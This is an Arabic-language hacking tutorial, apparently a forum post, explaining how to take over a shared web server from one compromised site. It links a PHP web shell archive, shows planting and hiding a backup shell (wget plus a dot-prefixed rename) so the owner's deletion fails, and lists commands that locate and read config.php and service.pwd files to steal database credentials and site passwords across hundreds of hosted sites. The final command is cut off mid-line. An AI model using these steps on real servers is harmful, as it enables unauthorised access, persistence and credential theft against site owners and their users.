طريقة #اختراق السيرفرات #شرح_حصري
لنفترض انك اخترقت موقع بأي ثغره .. او عندك انت موقع لك عند اي سيرفر
وتريد ان تخترق السيرفر طريقة اختراق السيرفر
اولآ بتحميل سكربت الشيل بلغة php على جهازك
وهي وصلة الشيل
http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
-------------------------------------------------------------------
ال php شيل ((phpshell )) هو سكربت بلغة (( php ))
وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا رؤية ملف الــ config
التي على السيرفر
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على #موقعك او الموقع الذي اخترقته..
بعد التحميل تستطيع تخترق السيرفر بشكل كامل ..
مثال ..👇
نفترض انك اخترقت هذا الموقع
http://www.Anonymous.com/
وقمت بتحميل الــ phpshell
على ملف download
سيصير العنوان بهدا الشكل
www.Anonymous.com/download/phpshell.php
وبعدها اذا دخلنا الى العنوان سوف ترى كلمة اسمها Command وامامها فراغ
في الفراغ هذا سوف تضع فيه اوامر اللينكس..
لكن قبل البدء في الشرح #الجديد.. احب ان اوضح نقطه مهمه ::--
يمكن ان يرى صاحب الموقع اللذي اخترقته الشيل.. ويذهب ويحذفه لك
ولكن لو وضعت اثنين واحد منهم مخفي.. يعني الاول اذا حذفه سوف يكون معنا واحد مخفي
لاخفائه نعمل بهذه الطريقة www.Anonymous.com/download/phpshell.php wget
وبعدها نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ اضفنا نقطة . واذا حذف الاول سوف يكون معنا الثاني ومخفي
---------------------------------------------
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.Anonymous.com/download/phpshell.php
وثم نجد كتابة اسمها Command وامامها فراغ
في #الفراغ هذا ندخل اوامر اللينكس عليه..
ونضع الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ ((safe mode))
شرح الاوامر --==--
والان سوف اعلمكم #طريقة سحب : قواعد البيانات - المواقع - الباسوردات
نبدأ من الاسهل حتى الاصعب
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
find / -name config.php
سوف تضهر لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر بالعادة تكون كثيرة وانا بالعادة يخرج لي 300و 250 موقع ))
المواقع سوف تكون باللون الزهري
والان اردنا ان نقرأ الذي #مكتوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
المهم نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdo/اسم الملف/config.php
بعدها سوف يضهر لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
اذهب اضرب #المنتدى وبعدها ملف الــ admin ودخل اليوزر والباسورد لقاعدة البيانات
او الدخول عن طريق برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الأن اكملنا من قاعدة #البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pw
وسوف يضهر المواقع بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون #الزهري هي المواقع...
حسنا الان نرى الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
سوف نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
وسوف ياتينا الباسورد للموقع ومشفر بمقياس DES
او نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_ht
بعدها يكون السيرفر والمواقع التي على السيرفر تحت صيطرتك وتستطيع ان تعمل فيهم ما تريد
Madjid_DZ